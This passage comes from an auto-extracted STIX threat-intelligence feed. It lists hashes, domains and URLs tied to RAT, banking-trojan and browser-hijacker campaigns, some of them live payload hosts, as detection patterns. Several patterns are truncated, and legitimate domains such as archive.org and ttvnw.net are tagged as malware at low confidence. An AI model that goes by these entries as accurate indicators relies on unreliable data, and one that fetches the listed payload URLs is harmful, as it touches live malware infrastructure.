YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .dll , PowerShell downloader for Insomnia RAT stages SHA256 ceb30a5eb9ad9d9c6712c80726df16f96f99d9fc0753be241b00b4d636eb576e t.ps1 , Insomnia RAT PowerShell loader SHA256 cf184d04ca31f","pattern":"[file:hashes.'SHA-256' = 'ceb30a5eb9ad9d9c6712c80726df16f96f99d9fc0753be241b00b4d636eb576e']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b29e638-60a1-47fd-9a58-79e4591efddc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: cf184d04ca31fb2b6b7efd85399c29c1136b539153e137ceb3877b1b905791de","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 0b4d636eb576e t.ps1 , Insomnia RAT PowerShell loader SHA256 cf184d04ca31fb2b6b7efd85399c29c1136b539153e137ceb3877b1b905791de Python component of the Insomnia RAT dual payload SHA256 62","pattern":"[file:hashes.'SHA-256' = 'cf184d04ca31fb2b6b7efd85399c29c1136b539153e137ceb3877b1b905791de']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02c68cc7-ba18-43df-9f8c-a3e4ecc6db51","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: d8d783f8e050a6e394f3c0aa5e2bc73a38d822e55fbc39c0648cbff566de3cdf","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: c87989c wscl.exe , ARKTunnel WebSocket tunneling RAT SHA256 d8d783f8e050a6e394f3c0aa5e2bc73a38d822e55fbc39c0648cbff566de3cdf Resource icon shared across ARKTunnel samples SHA256 06e0af","pattern":"[file:hashes.'SHA-256' = 'd8d783f8e050a6e394f3c0aa5e2bc73a38d822e55fbc39c0648cbff566de3cdf']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a84abced-0bf4-41d7-abf9-e2bb408de851","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: e05bc22afbc5ddd50b49c85ee169dd13318000d38286de2b8bcff98217256a8d","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 90b4560f1 eld1.exe , ARKTunnel steganography dropper SHA256 e05bc22afbc5ddd50b49c85ee169dd13318000d38286de2b8bcff98217256a8d procorTrex.zip , archive extracted from the bitmap payload","pattern":"[file:hashes.'SHA-256' = 'e05bc22afbc5ddd50b49c85ee169dd13318000d38286de2b8bcff98217256a8d']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0cb1b38-5899-469f-aa36-8a1f44947853","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: fc485882626512e7ff82a1d7cd8e8fb3e9751b026d97e682d6908aefff1f2d73","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: fferLoader installer delivered through SEO poisoning SHA256 fc485882626512e7ff82a1d7cd8e8fb3e9751b026d97e682d6908aefff1f2d73 windirstat.tmp unpacked OfferLoader stage SHA256 3052bd320a","pattern":"[file:hashes.'SHA-256' = 'fc485882626512e7ff82a1d7cd8e8fb3e9751b026d97e682d6908aefff1f2d73']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a979b547-0212-4adf-be78-abf8057b7396","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: fdcc95b7791c0d6590dcf1a412dc9fcc92ad2095818d1b78368b31efad012007","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: c15bab72104 eld2.tmp , unpacked Docro Hijacker stage SHA256 fdcc95b7791c0d6590dcf1a412dc9fcc92ad2095818d1b78368b31efad012007 Adblock.dll , Chrome Secure Preferences bypass DLL File nam","pattern":"[file:hashes.'SHA-256' = 'fdcc95b7791c0d6590dcf1a412dc9fcc92ad2095818d1b78368b31efad012007']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9cc97d00-8ccf-48f8-b80f-671f029b7b74","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: http://aa.amazingshield[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: per[.]info/aa.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent","pattern":"[url:value = 'http://aa.amazingshield[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c42deb7-e1d8-4112-a676-d77b488e4dcf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://drelto[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: yz/33244556546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain s","pattern":"[url:value = 'https://drelto[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c4e8e800-26c9-4847-b215-b1a251652600","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://stryper[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sHelper\\docro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia R","pattern":"[url:value = 'https://stryper[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--679afc55-24fa-4329-8365-f16595d1cbf0","created":"2026-09-14T07:24:39.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ttvnw.net","description":"Seen in \"Malicious Twitch Browser Extension Leaks OAuth Tokens From Nearly 31,000 Users\" (The Hacker News). Context: es so by routing Twitch's video-playlist requests to \"usher.ttvnw[.]net\" through operator-controlled proxy servers along with the","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T07:24:39.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/malicious-twitch-browser-extension.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4e8f702b-6f94-4514-9288-11a6a16bf16c","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 94ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserve","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3ec56502-fbb1-4222-9bd0-f802be20ea56","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: ain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net IP address 72[.]167[.]48[.]63 IP address 209[.]","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62c17708-01d2-47fa-b6ce-79c67f732c7f","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 76409f69d445a93910964f8db457bafafb97a011da59e73 PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd Email SHA-256 debe871710268e7bb770b72c6772f2e0b8bd40a22b2ea","pattern":"[file:hashes.'SHA-256' = '40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fda78e4b-6de6-48e6-a0b4-2a848ebed9b9","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: o financial websites. IOCs Indicator type Value PDF SHA-256 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73 PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355","pattern":"[file:hashes.'SHA-256' = '6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6435c4a1-5934-48b7-9a9a-217643eb5179","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: c21266e40afe99afc96feea0d355732af5bea459db1dd Email SHA-256 debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057 Email SHA-256 eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc6","pattern":"[file:hashes.'SHA-256' = 'debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b8030a3d-fbb3-44f3-b4f5-d96ae1e75ee5","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 0b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057 Email SHA-256 eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Dom","pattern":"[file:hashes.'SHA-256' = 'eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bf82e949-e0fc-4c7d-bd8f-800eb32e56ee","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 15700817e517fefcabc0291e350daf3e10d52f6b24de07b4e2396843a671adda","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: 122ea3cbcb99c8a525b0b30ab985bc8e375c7a 3200000_02C37000.exe 15700817e517fefcabc0291e350daf3e10d52f6b24de07b4e2396843a671adda Note: IP addresses and domains are intentionally defanged (","pattern":"[file:hashes.'SHA-256' = '15700817e517fefcabc0291e350daf3e10d52f6b24de07b4e2396843a671adda']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--339ab840-d4c6-432b-80e7-d3bfcf45374a","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b30ab985bc8e375c7a","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: d5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c 3200000.exe 22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b30ab985bc8e375c7a 3200000_02C37000.exe 15700817e517fefcabc0291e350daf3e10d52f","pattern":"[file:hashes.'SHA-256' = '22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b30ab985bc8e375c7a']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9bd6e31f-7b99-4f32-bfe5-1145ca49a643","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: 1fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6 kojuyn.ini 4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c 3200000.exe 22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b","pattern":"[file:hashes.'SHA-256' = '4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65e970c3-f453-4b3a-b32a-67c076959b37","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: ae4144ff75a9b6371fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: Cs Filename SHA-256 Right-click to open Invoice Details.bat ae4144ff75a9b6371fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6 kojuyn.ini 4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c74","pattern":"[file:hashes.'SHA-256' = 'ae4144ff75a9b6371fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9efeee25-1e77-4853-8b49-40d3a8f06f71","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 35a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemoryScanne","pattern":"[domain-name:value = 'archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2301a067-568b-4141-b658-e5e48c426ca0","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: connection.upgradeonline.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage: persistence and th","pattern":"[domain-name:value = 'connection.upgradeonline.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92e56c0f-144e-4eac-ae10-91b299e1ea92","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: granderevolucao.store","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: licious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Inj","pattern":"[domain-name:value = 'granderevolucao.store']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52c719fd-d114-4b43-a10b-80d47bd0be7e","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: ia601808.us.archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel.jpg After the","pattern":"[domain-name:value = 'ia601808.us.archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cc95ffbe-507e-4c21-85ca-66d771e10bde","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: volmira.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: abA6740d07b . The extension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad1f4c6f-adab-4cb3-a4b8-07842b10ca84","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: www.creamp1eonlyfans.net","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not return any content, a","pattern":"[domain-name:value = 'www.creamp1eonlyfans.net']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--901dccc9-bce4-4e79-8916-92d904b0f063","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: zaviro.online","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: xtension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2 value was updated on","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f80277cc-f11b-408f-a2d6-d29e252a0e2d","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"md5: 5c92d3b8734b4f498752f735a1ca0987","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: n installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]","pattern":"[file:hashes.MD5 = '5c92d3b8734b4f498752f735a1ca0987']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3969c27f-32d4-4b62-8333-36a674b4af63","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 106eac79396a3ff77b8f375c391260ce422be2ae4d55d3aa75b2635cbdc0fa42","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: tection For this analysis, we examine the following script: 106eac79396a3ff77b8f375c391260ce422be2ae4d55d3aa75b2635cbdc0fa42 . The obfuscation is fairly basic: function names are repla","pattern":"[file:hashes.'SHA-256' = '106eac79396a3ff77b8f375c391260ce422be2ae4d55d3aa75b2635cbdc0fa42']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32842648-345f-4dc8-b90f-09bf2fdfb4b5","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: 5ece7fd3766b0b7f8aadefa562313cea6c3c94f9398658dd389910e5be44f552","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ful pivot for finding additional first-stage samples (e.g., 5ece7fd3766b0b7f8aadefa562313cea6c3c94f9398658dd389910e5be44f552 ). The sandbox-detection heuristic consists of two checks.","pattern":"[file:hashes.'SHA-256' = '5ece7fd3766b0b7f8aadefa562313cea6c3c94f9398658dd389910e5be44f552']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32ea2b8c-61e7-4a3a-9477-6c8f255aa1a4","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"sha256: c8c38634dd44d7c6162c66174a6ee23ee404265125166e8d757681bdd66a4268","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ugging. For this analysis, we examine the following binary: c8c38634dd44d7c6162c66174a6ee23ee404265125166e8d757681bdd66a4268 . KREMLIN string decryption algorithm As noted at the begin","pattern":"[file:hashes.'SHA-256' = 'c8c38634dd44d7c6162c66174a6ee23ee404265125166e8d757681bdd66a4268']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--238218a0-4900-4a7d-b454-900199601bbf","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"url: https://archive[","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemorySca","pattern":"[url:value = 